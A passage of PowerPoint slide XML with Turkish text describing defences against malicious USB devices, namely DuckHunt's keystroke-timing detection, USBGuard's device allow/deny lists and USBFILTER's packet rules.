            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruşlarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>günlüğe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kaydederek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruşları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arasındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>süreyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ölçerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerçekleştirilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruşları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arasındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>boşluk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>küçükse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>DuckHunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavyeyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>devre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dışı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bırakabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geçici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>devre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dışı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bırakabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sırasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bozabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>basitçe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olayı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kaydedebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFF3B208-1D6B-4B37-9437-8C31F23E7EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4401646" y="1682298"/>
            <a:ext cx="1728041" cy="82703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USBGuard</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1500" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{450A51AF-D659-4750-B383-8874B54BB82E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4401646" y="2503562"/>
            <a:ext cx="1728041" cy="1701800"/>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000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>USBGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>önceden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tanımlanmış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>listeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>beyaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>listeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>göre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtlarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yetkilendirileceğine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hangilerinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>reddedileceğine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tabanlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> plan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>programıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Liste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kimlikleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>niteliklerden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>oluşur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>takılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> her USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> PID, VID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bağlantı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>noktası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arabirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>türü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>seri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>numarası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> karma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>değeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vardır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC216C3B-54B9-44AE-89DC-2B06506CA70B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129687" y="1682298"/>
            <a:ext cx="1728041" cy="82703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a:t>USBFILTER</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1200" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6045EA35-C46A-451B-8ADD-3BC0941ACECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129687" y="2503562"/>
            <a:ext cx="1728041" cy="1701800"/>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000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>USBFILTER, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yolundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geçen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amaçlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>paketlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>belirlemek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tanımlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kural</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veritabanını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
